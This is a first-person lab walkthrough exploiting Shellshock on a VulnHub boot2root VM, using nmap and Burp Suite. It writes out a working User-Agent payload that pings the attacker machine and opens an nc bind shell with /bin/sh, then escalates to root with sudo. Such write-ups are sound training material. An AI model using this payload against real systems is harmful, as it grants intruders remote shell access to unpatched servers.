CVE-2014-6271: Shellshock

Welcome

This VM is a boot2root challenge downloaded from VULNHUB: it contains no flags, and the goal is to get root access. CVE-2014-6271 (Shellshock) was a very severe vulnerability. Bash imported function definitions from environment variables and kept executing whatever followed the function body, so any program that placed attacker-controlled input in an environment variable before starting Bash (a CGI script, for example, gets HTTP headers such as User-Agent exported into its environment) handed the attacker remote command execution, in practice a shell on the box.

I am using VMware Workstation Pro 12 and my attacker machine is Parrot OS 3.4.1. Both VMs are on a bridged network, so they are connected directly to the router. I assume you know how to set up a lab; if not, search for how to set up a VM on VMware, there are many tutorials available. Information about the VM and the download itself are on VULNHUB. After booting the VMs, my attacker IP addresses are 192.168.16.105 on eth0 and 192.168.192.132 on eth1.


Knowing my own address and therefore the subnet, I ran an NMAP scan to find the target and its open ports. Host discovery alone can also be done with NETDISCOVER, which finds hosts on the local network by ARP but reports no port information.


The NMAP output is more detailed than plain host discovery because it also gives the port state. Port 80 is open, so a website is hosted on the target, and opening the IP in my browser confirms it.


There was nothing interesting on the web page, and checking the page source gave nothing interesting either.

Then I got an idea and started BURPSUITE, whose proxy listens on 127.0.0.1 port 8080 by default, and pointed Firefox at that proxy: open the menu, click Preferences, choose Advanced from the side menu, switch to Network and click Connection Settings, then set the HTTP proxy to 127.0.0.1 and the port to 8080. Another way to do this is the FoxyProxy add-on. In BURPSUITE I turned off Intercept in the Proxy tab and reloaded the target IP in the browser. The request was captured in the HTTP history of the Proxy tab.

Then I right-clicked the request and chose the option to send it to Repeater; the Repeater tab lights up as soon as the request reaches it. In the Repeater tab double-click the User-Agent value and replace it with the malicious payload:

() { :; }; /bin/bash -c 'ping -c 1 192.168.16.105 ; nc -l -p 1324 -e /bin/sh'

Here 192.168.16.105 is my attacker VM and 1324 is the port on which the target will listen for our shell. The () { :; }; prefix is what makes a vulnerable Bash treat the variable as a function definition and then execute the command after it; the CGI script behind the page exports the User-Agent header as the environment variable HTTP_USER_AGENT, so the command runs as the web server's user. The ping (-c takes a count, so -c 1 sends one ICMP echo to my attacker VM) is a side channel that shows the command ran even if the shell fails, and nc then listens on port 1324 with /bin/sh attached. Click Go. The request returns nothing, because nc is now blocking inside the CGI process, which means our payload is being executed on the target.

Open a new terminal and connect to the port from the payload (1324 in my case) on the target with NETCAT. The payload made the target listen, so this is a bind shell and the attacker side is the client, not a listener. Nothing is printed when the connection is made because nc -e /bin/sh gives no prompt, so I just typed whoami to see whether anything happens and boom! We have a shell. Then a simple sudo -s and we are root, which works here because the account the web server runs as is allowed to run sudo without a password on this VM.

DONE!

If you have any queries or any suggestions please leave it in the comments section below.
